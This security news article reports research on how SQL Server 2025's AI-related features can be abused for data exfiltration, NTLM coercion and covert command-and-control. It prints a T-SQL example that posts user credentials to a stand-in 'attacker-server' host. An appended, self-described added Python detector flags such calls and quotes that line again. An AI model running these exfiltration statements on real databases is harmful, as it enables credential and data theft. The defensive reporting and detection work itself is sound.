GBHackers

Hackers Could Abuse SQL Server 2025 AI Features to Steal Sensitive Data


A new security analysis has revealed that Microsoft SQL Server 2025’s native AI capabilities can be repurposed by attackers to stealthily exfiltrate sensitive data and establish command-and-control (C2) channels directly within the database engine, significantly expanding the post-exploitation attack surface.

Security researcher Justin Kalnasy of SpecterOps demonstrated that newly introduced AI-focused features, intended to support modern data workflows such as Retrieval-Augmented Generation (RAG), can be abused to bypass traditional detection mechanisms.

These features include the stored procedure sp_invoke_external_rest_endpoint, the CREATE EXTERNAL MODEL statement, and the AI_GENERATE_EMBEDDINGS function, all of which enable SQL Server to communicate with external services over HTTPS.

Hackers Could Abuse SQL Server 2025

The most critical issue lies in the sp_invoke_external_rest_endpoint capability, which allows database instances to send arbitrary HTTP requests to external endpoints with payloads up to 100MB.

While designed for API integrations, this functionality effectively provides attackers with a built-in data exfiltration channel.

Once an adversary gains high-privileged access, such as sysadmin, they can extract entire tables or files and transmit them to attacker-controlled infrastructure without relying on traditional tools like PowerShell or xp_cmdshell, which are more likely to trigger alerts.

For example, attackers can serialize sensitive database records into JSON format and exfiltrate them via HTTPS:

DECLARE @payload NVARCHAR(MAX);

SELECT @payload = (
  SELECT username, password
  FROM dbo.app_users
  FOR JSON AUTO
);
EXEC sp_invoke_external_rest_endpoint
  @url = N'https://attacker-server/collect',
  @method = 'POST',
  @payload = @payload;

This approach allows bulk data theft in chunks, reducing operational friction and avoiding bandwidth constraints typically associated with C2 frameworks.

Additionally, file-level exfiltration can be achieved by combining the REST endpoint feature with OPENROWSET, enabling attackers to read sensitive files from the underlying system and transmit them externally.

Beyond direct data theft, the research highlights how SQL Server 2025 can be transformed into a persistent exfiltration platform.

By leveraging triggers, attackers can automatically send newly inserted or updated records to remote servers in real time. This enables continuous credential harvesting or data leakage without repeated manual interaction.

Figure: Data exfiltration (Source: SpecterOps)

Another notable technique involves abusing the CREATE EXTERNAL MODEL feature to coerce NTLM authentication over SMB.

By specifying a malicious UNC path as the model location, attackers can force SQL Server to authenticate against attacker-controlled infrastructure, enabling credential capture or relay attacks within enterprise environments.

More advanced tradecraft combines these AI features into a covert C2 channel. By registering an external model that points to an attacker-controlled API and using AI_GENERATE_EMBEDDINGS as a communication mechanism, adversaries can issue commands and receive results disguised as legitimate AI embedding traffic.

This technique blends malicious activity with normal AI workflows, making detection significantly more difficult, especially in environments where outbound HTTPS traffic from database servers is now considered legitimate.

The introduction of these capabilities represents a fundamental shift in how database systems operate within enterprise networks.

Historically, outbound traffic from SQL servers was considered suspicious; however, AI integration has normalized this behavior, rendering traditional detection strategies less effective.

Defenders are advised to reassess SQL Server security baselines, particularly around privilege management and feature enablement.

Monitoring for the creation or modification of external models, auditing the use of high-risk features such as xp_cmdshell and CLR assemblies, and restricting outbound network access from database servers are critical mitigation steps. Organizations leveraging AI features should also baseline expected traffic patterns to identify anomalies indicative of abuse.
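
One way to apply this monitoring advice to T-SQL statement text captured by an audit or trace, as an added example that is not from the SpecterOps research or the original article. The allowlisted host, the finding labels and the sample statements are assumptions constructed for illustration, and the matching is a text heuristic over statement text rather than a parser.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this instance is expected to reach, from your own baseline.
ALLOWED_HOSTS = {"api.contoso.example"}

REST_CALL = re.compile(r"\bsp_invoke_external_rest_endpoint\b", re.I)
URL_ARG = re.compile(r"@url\s*=\s*N?'([^']*)'", re.I)
MODEL_DDL = re.compile(r"\b(?:CREATE|ALTER)\s+EXTERNAL\s+MODEL\b", re.I)
LOCATION = re.compile(r"\bLOCATION\s*=\s*N?'([^']*)'", re.I)
TRIGGER_DDL = re.compile(r"\b(?:CREATE|ALTER)\s+TRIGGER\b", re.I)
BULK_READ = re.compile(r"\bOPENROWSET\s*\(\s*BULK\b", re.I)

def host_of(target):
    """Lower-cased host of a URL, or '' when it cannot be parsed."""
    return (urlparse(target).hostname or "").lower()

def review(statement):
    """Return findings for one audited T-SQL statement (empty list = nothing to review)."""
    findings = []
    if REST_CALL.search(statement):
        urls = URL_ARG.findall(statement)
        if not urls:  # URL passed as a variable: cannot be checked against the baseline
            findings.append("rest-call-dynamic-url")
        findings += [f"rest-call-unlisted-host:{host_of(u)}"
                     for u in urls if host_of(u) not in ALLOWED_HOSTS]
        if TRIGGER_DDL.search(statement):
            findings.append("rest-call-inside-trigger")
        if BULK_READ.search(statement):
            findings.append("file-read-with-rest-call")
    if MODEL_DDL.search(statement):
        findings.append("external-model-change")
        for loc in LOCATION.findall(statement):
            if loc.startswith("\\\\"):  # UNC path: SMB/NTLM authentication risk
                findings.append("external-model-unc-location")
            elif host_of(loc) not in ALLOWED_HOSTS:
                findings.append(f"external-model-unlisted-host:{host_of(loc)}")
    return findings

# Constructed, abbreviated statement text as an audit or trace might record it.
SAMPLES = [
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://api.contoso.example/v1/score', @payload = @p;",
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://attacker-server/collect', @method = 'POST', @payload = @payload;",
    "CREATE TRIGGER trg ON dbo.app_users AFTER INSERT AS EXEC sp_invoke_external_rest_endpoint @url = @u, @payload = @p;",
    r"CREATE EXTERNAL MODEL m1 WITH (LOCATION = '\\203.0.113.7\share\m', MODEL_TYPE = EMBEDDINGS);",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(review(s) or ["ok"], "<-", s[:60])
```

A call whose URL is passed in a variable is reported rather than skipped, since it cannot be compared with the baseline from statement text alone.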

This research underscores a broader trend: as AI capabilities become embedded in core enterprise software, they introduce new avenues for stealthy exploitation. Without robust monitoring and strict access controls, these features risk becoming powerful tools for attackers operating inside trusted environments.
